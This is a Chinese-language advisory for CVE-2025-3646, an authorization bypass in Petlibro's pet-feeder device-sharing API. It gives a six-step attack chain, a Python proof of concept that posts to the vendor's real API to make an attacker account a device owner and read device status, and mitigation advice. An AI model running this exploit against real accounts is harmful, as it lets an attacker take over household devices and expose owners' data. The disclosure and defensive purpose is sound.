CVE-2025-3646 | Petlibro智能宠物喂食器平台设备共享API授权绕过漏洞

漏洞信息

漏洞编号

CVE-2025-3646

漏洞类型

授权绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Petlibro Smart Pet Feeder Platform

漏洞概述

CVE-2025-3646是Petlibro智能宠物喂食器平台中存在的一个高危授权绕过漏洞。该漏洞存在于Petlibro智能宠物喂食器设备的设备共享API接口中，由于应用程序在处理设备共享请求时缺少适当的权限验证机制，导致任何未授权的攻击者都可以通过构造恶意请求，将任意用户添加为设备的共享所有者，从而获得对目标设备的未授权访问权限。攻击者利用此漏洞可以绕过正常的用户认证和授权流程，无需具备任何设备访问权限，即可将其他用户添加为设备共享者，进而获取设备的控制权和查看设备所有者的敏感信息。该漏洞影响Petlibro Smart Pet Feeder Platform 1.7.31及之前的所有版本，CVSS评分达到7.3分，属于高危级别漏洞。由于该漏洞利用无需认证且攻击复杂度低，攻击者可以在无需任何前期准备的情况下发起攻击，对大量设备造成安全威胁。Petlibro作为智能宠物喂食器领域的知名厂商，其设备通常部署在家庭环境中，漏洞的存在可能导致用户隐私数据泄露和宠物喂食控制权被恶意篡改。

技术细节

Petlibro智能宠物喂食器平台的设备共享功能允许用户将设备共享给其他账户，实现多人共同管理宠物喂食器的功能。然而，该功能的后端API实现存在严重的授权绕过漏洞。在正常情况下，当用户A希望将设备共享给用户B时，系统应当验证用户A是否为该设备的合法所有者，并确保用户B的账户信息有效。然而，由于API端点缺少对请求发起者身份和权限的验证，攻击者可以直接向设备共享API发送请求，在请求参数中指定目标设备ID和要添加的共享用户信息，系统会直接处理该请求而无需验证请求者是否具有设备管理权限。攻击者只需知道目标设备的唯一标识符（设备ID），即可构造如下请求：POST /api/device/share，携带目标设备ID和攻击者控制的账户信息，系统将自动将攻击者的账户添加为该设备的共享所有者。成功利用后，攻击者可以在Petlibro应用程序中看到被攻击的设备，并获取设备状态、所有者的账户信息等敏感数据。更严重的是，攻击者还可以进一步利用设备共享权限执行喂食操作、修改喂食计划等恶意行为。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者收集目标Petlibro设备的设备ID，可能通过设备二维码、WiFi探测或社工手段获取

STEP 2

步骤2: 构造恶意请求

攻击者构造设备共享API请求，包含目标设备ID和攻击者控制的账户信息，设置为owner权限

STEP 3

步骤3: 发送未授权请求

攻击者直接向Petlibro服务器发送POST请求到/api/device/share端点，无需任何认证凭据

STEP 4

步骤4: 绕过授权检查

由于API缺少权限验证逻辑，系统直接处理请求，将攻击者账户添加为设备共享所有者

STEP 5

步骤5: 获取未授权访问

攻击者使用添加的共享权限访问目标设备，查看设备状态、所有者信息和喂食计划

STEP 6

步骤6: 进一步利用

攻击者可修改喂食时间、喂食量等设置，甚至完全接管设备控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-3646 PoC - Petlibro Smart Pet Feeder Authorization Bypass # Target: Petlibro Smart Pet Feeder Platform <= 1.7.31 # Vulnerability: Missing authorization check in device share API TARGET_DEVICE_ID = "TARGET_DEVICE_ID_HERE" # Target device ID ATTACKER_USER_ID = "[email protected]" # Attacker's account API_BASE_URL = "https://api.petlibro.com" # API endpoint def exploit_device_share(): """ Exploit the authorization bypass vulnerability to add attacker as device owner """ # Step 1: Prepare the malicious share request share_payload = { "device_id": TARGET_DEVICE_ID, "share_to": ATTACKER_USER_ID, "permission": "owner" } # Step 2: Send the unauthorized share request # The API does not verify if the requester has permission to share the device headers = { "Content-Type": "application/json", "User-Agent": "PetlibroApp/1.7.31" } try: response = requests.post( f"{API_BASE_URL}/api/device/share", json=share_payload, headers=headers, timeout=10 ) print(f"[*] Request sent to device share API") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: result = response.json() if result.get("success"): print("[+] SUCCESS: Attacker added as device owner!") print(f"[+] Gained unauthorized access to device: {TARGET_DEVICE_ID}") return True print("[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_access(): """ Verify the attacker now has access to the victim's device """ headers = { "User-Agent": "PetlibroApp/1.7.31", "X-User-Email": ATTACKER_USER_ID } try: response = requests.get( f"{API_BASE_URL}/api/device/{TARGET_DEVICE_ID}/status", headers=headers, timeout=10 ) if response.status_code == 200: print("[+] VERIFIED: Attacker can now view device information") print(f"[+] Device data: {response.text}") return True return False except requests.exceptions.RequestException as e: print(f"[-] Verification failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-3646 PoC - Petlibro Device Share Authorization Bypass") print("=" * 60) if exploit_device_share(): verify_access() print("=" * 60)

影响范围

Petlibro Smart Pet Feeder Platform <= 1.7.31

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制Petlibro设备的互联网暴露，仅在必要时通过VPN或安全网络访问；2）监控设备共享相关的API日志，及时发现异常共享行为；3）启用设备的多因素认证功能（如果支持）；4）定期检查账户关联的设备列表，发现未知设备立即移除；5）考虑在网络层面实施访问控制，限制对Petlibro API服务器的访问来源；6）关注厂商官方安全公告，及时应用安全更新。